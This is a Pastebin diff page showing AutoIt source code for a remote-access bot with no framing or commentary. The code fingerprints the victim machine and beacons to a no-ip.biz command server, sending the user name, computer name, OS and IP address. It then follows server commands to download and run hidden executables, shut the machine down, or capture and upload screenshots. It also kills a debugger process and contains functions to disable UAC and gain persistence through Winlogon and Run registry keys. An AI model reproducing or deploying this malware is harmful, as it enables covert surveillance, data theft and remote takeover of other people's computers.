API tools faq
paste
View difference between Paste ID: TWhuAQbk and 5nRswagi
SHOW: | | - or go back to the newest paste.
1
#NoTrayIcon
2
;#RequireAdmin
3
#include <File.au3>
4
#include <Misc.au3>
5
#include <string.au3>
6
#include <crypt.au3>
7
#include <ScreenCapture.au3>
8
9
;Mutex

10
;------

11
12
;Singleton("7563545689855477")

13
14
;HWID

15
;------

16
17
Global $hwid = id()

18
19
;disable uac

20
;------

21
22
if IsAdmin() Then

23
    ;_Disable_UAC()

24
EndIf

25
26
;SETTING VARIABLES

27
;------

28
$mainHome      =             "http://jlibs8080.no-ip.biz"    ;main domain

29
$mainDir      =             "/bnt2/"

30
$upshot      = $mainHome & $mainDir &    "u.php"            ;path to upload file

31
$serverHome     = $mainHome & $mainDir &    "s.php"            ;path to server file

32
$cmdDir      = $mainHome & $mainDir &    "dir.php"            ;path to commandDir file

33
34
;------above = url[/]------below = local path[\]------

35
$subDir      = "\n0625d6982e9krf824\"

36
$filei      = "\jhgr78.log"            ;update log - make random VIA builder

37
38
;------

39
$interv      = 5

40
$counter      = $interv * 1000 * 60            ;15 minutes

41
;------

42
43
$timeInit = TimerInit()

44
Global $result

45
Global $ip     = @IPAddress1

46
;Do On Start Up

47
;------

48
49
;FileMove(@ScriptFullPath, @TempDir & $subDir &  "hvn.exe", 9)

50
51
if(FileExists(@TempDir & $subDir) <> 1) Then

52
   DirCreate(@TempDir & $subDir)

53
EndIf

54
55
;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe')

56
;_Run(@ScriptFullPath)

57
58
;Anti Debugger

59
;------

60
61
$process = "OLLYDBG.EXE"

62
63
If ProcessExists($process) Then

64
   ProcessClose($process)

65
EndIf

66
67
;Initial update

68
;------

69
70
_Update($filei)

71
72
;UPDATE

73
;------

74
While 1

75
   While 1

76
77
      $updateTime = TimerDiff($timeInit)

78
79
      if $updateTime > $counter Then

80
      ;ConsoleWrite("test")

81
      ;$command     = InetRead($cmdDir,1)

82
      $Command      = _Update($filei)

83
84
      if $command == "-1" Or StringLeft($command,3)  == "<br" Then

85
86
      $interv     = Random(5,30,1)

87
      $counter     = $interv * 1000 * 60

88
      $timeInit     = TimerInit()

89
      ExitLoop

90
91
      EndIf

92
93
      $process    = BinaryToString($command)

94
      $comS      = StringSplit($process,"|")

95
      $uComs     = UBound($comS) - 1

96
      Global $commandVal[$uComs+1][10]

97
98
      for $j = 1 to $uComs

99
100
      $cMas     = StringSplit($comS[$j],",")

101
      $uCmas = UBound($cMas) - 1

102
103
      for $l = 1 to $uCmas

104
105
            $commandVal[$j][$l] = $cMas[$l]

106
107
      Next

108
      Next

109
110
      $uCommandVal = UBound($commandVal)-1

111
112
      for $j = 1 to $uCommandVal

113
114
      Switch $commandval[$j][1]

115
116
            Case 1

117
118
             _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX

119
120
            Case 2

121
122
             _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL

123
124
            Case 3

125
126
             _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4])

127
128
            Case 4

129
130
             ;haha($commandval[$j][1])

131
             Shutdown(6)

132
133
            Case 5

134
135
             $scrnName = Random(12,999999,1) & ".jpg"

136
             _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName)

137
             ScrnUp($scrnName)

138
             FileDelete(@ScriptDir & "\" & "*.jpg")

139
140
      EndSwitch

141
142
      Next

143
144
      ;//////---end of update---//////

145
      ;reset time

146
      ;------

147
148
      ;$interv     = Random(5,30,1)

149
      ;$counter     = $interv * 1000 * 60

150
      Sleep(500)

151
      $timeInit = TimerInit()

152
      EndIf

153
154
      Sleep(50)

155
156
   WEnd

157
WEnd

158
;//////---Functions---//////

159
160
;------

161
;HWID

162
163
func id()

164
   $disc = StringLeft(@SystemDir, 3)

165
   $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc)

166
   $hwid1  = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2))

167
   $hwid2 = _StringToHex(stringReverse($hwid1))

168
   $final = $start & $hwid2

169
   $start = _Crypt_HashData($Final,$CALG_MD5)

170
   $epicFinal = StringMid($start,1,8)  & ":" &  StringMid($start,8,16)

171
172
   Return StringSplit($epicFinal, ":")

173
EndFunc

174
175
;------

176
;MUTEX

177
178
Func Singleton($semaphore)

179
    Local $ERROR_ALREADY_EXISTS = 183

180
    DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore)

181
    Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")

182
    If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1

183
EndFunc

184
185
;------

186
;Disable UAC

187
188
Func _Disable_UAC()

189
    If @OSArch = "X64" Then

190
      $pref = "64"

191
    Else

192
      $pref = ""

193
    EndIf

194
    $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0")

195
    $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0")

196
    Sleep(500)

197
    If $r1 + $r2 = 2 Then

198
      Return True

199
    Else

200
      Return False

201
    EndIf

202
EndFunc

203
204
;------

205
;StartUp

206
207
Func _run($file, $type = 1)

208
   $ret = False

209
   $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")

210
   if StringInStr($arun, @ScriptName) = 0 Then

211
      $name = @ScriptName

212
      FileCopy($file, @WindowsDir & "\" & $name, 1)

213
      $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name)

214
   EndIf

215
   Return $ret

216
EndFunc

217
218
;------

219
;update

220
221
Func _Update($updateFile)

222
223
Global $ip     = @IPAddress1

224
$compName     = @ComputerName

225
$os      = @OSVersion

226
$userName     = @UserName

227
$Name      = $hWID[1]

228
$password    = $hwid[2]

229
230
$memStats = MemGetStats()

231
232
_FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ")

233
234
$infoz     = FileOpen(@TempDir & $updateFile)

235
$infozz = FileRead($infoz)

236
237
$serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName

238
$oHTTP = ObjCreate("winhttp.winhttprequest.5.1")

239
$oHTTP.Open("POST", $serverHome, False)

240
$oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded")

241
$oHTTP.Send($serverdata)

242
$oReceived = $oHTTP.ResponseText

243
FileClose($infoz)

244
245
ConsoleWrite($oReceived & @CRLF)

246
247
FileDelete(@TempDir & $updateFile)

248
Return $oReceived

249
;Exit

250
EndFunc

251
252
;------

253
;DL n EX

254
255
Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="")

256
257
   $result = ""

258
259
      If $Dwnl == 1 Then

260
      $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName)

261
      InetClose($dlget)

262
263
      If $dlget <> 0 Then

264
      $result &= "dl-succ-" & $DlFileName

265
      Else

266
      $result &= "dl-error-fail-" & $DlFileName

267
      EndIf

268
      EndIf

269
270
      If $DlnEx == 1 Then

271
272
      ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE)

273
      Sleep(500)

274
275
      $dlNexPrcExs = ProcessExists($DlFileName)

276
277
      If $dlNexPrcExs <> 0 Then

278
      $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-"

279
      Else

280
      $result &= "-exe-FAIL-To-Start-" & $DlFileName

281
      EndIf

282
283
      EndIf

284
285
   _FileWriteLog(@TempDir & $filei, $result)

286
287
EndFunc

288
289
;------

290
;upload scrnshot

291
292
Func ScrnUp($scrnFile)

293
294
Local $picOpen      = FileOpen(@ScriptDir & "\" & $scrnFile,16)

295
Local $picRead      = FileRead($picOpen)

296
Local $boundary     = "a65h7a"             & @CRLF

297
Local $boundary2     = "--" & $boundary

298
Local $binary      = "Content-Transfer-Encoding: binary"     & @CRLF

299
local $typeCon      = "Content-Type: txt/html"             & @CRLF & @CRLF

300
301
Local $postData = $boundary2

302
303
      $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF

304
      $postData &= $typeCon

305
      $postData &= $picRead & @CRLF

306
      $postData &= "--a65h7a--";End of HTTP HEADER

307
308
$oHTTP = ObjCreate("winhttp.winhttprequest.5.1")

309
$oHTTP.Open("POST", $upshot, False)

310
$oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary)

311
$oHTTP.Send($postData)

312
$oReceived = $oHTTP.ResponseText

313
314
FileClose($picOpen)

315
316
EndFunc

317
;------

318
;debug Purpuses

319
func haha($var)

320
321
ConsoleWrite("haha it worked" & @CRLF)

322
ConsoleWrite($var & @CRLF)

323
324
EndFunc
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!